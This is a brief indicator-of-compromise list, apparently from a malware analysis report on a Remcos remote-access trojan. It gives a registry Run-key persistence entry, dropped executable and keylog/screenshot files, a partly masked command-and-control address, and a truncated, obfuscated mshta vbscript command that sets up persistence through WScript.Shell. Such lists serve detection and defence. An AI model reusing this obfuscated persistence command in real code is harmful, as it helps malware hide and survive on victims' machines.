Technical information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Broderlands4' = '%TEMP%\underwool.exe'
- %WINDIR%\win.ini
- %TEMP%\underwool.exe
- %APPDATA%\Screenshots\time_20181205_192011.png
- %APPDATA%\Screenshots\time_20181205_192011.dat
- %APPDATA%\remcos\logs.dat
- %APPDATA%\Screenshots\time_20181205_192011.png
- '18#.#44.30.119':1111
- '%TEMP%\underwool.exe'
- '<SYSTEM32>\mshta.exe' vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\Curren...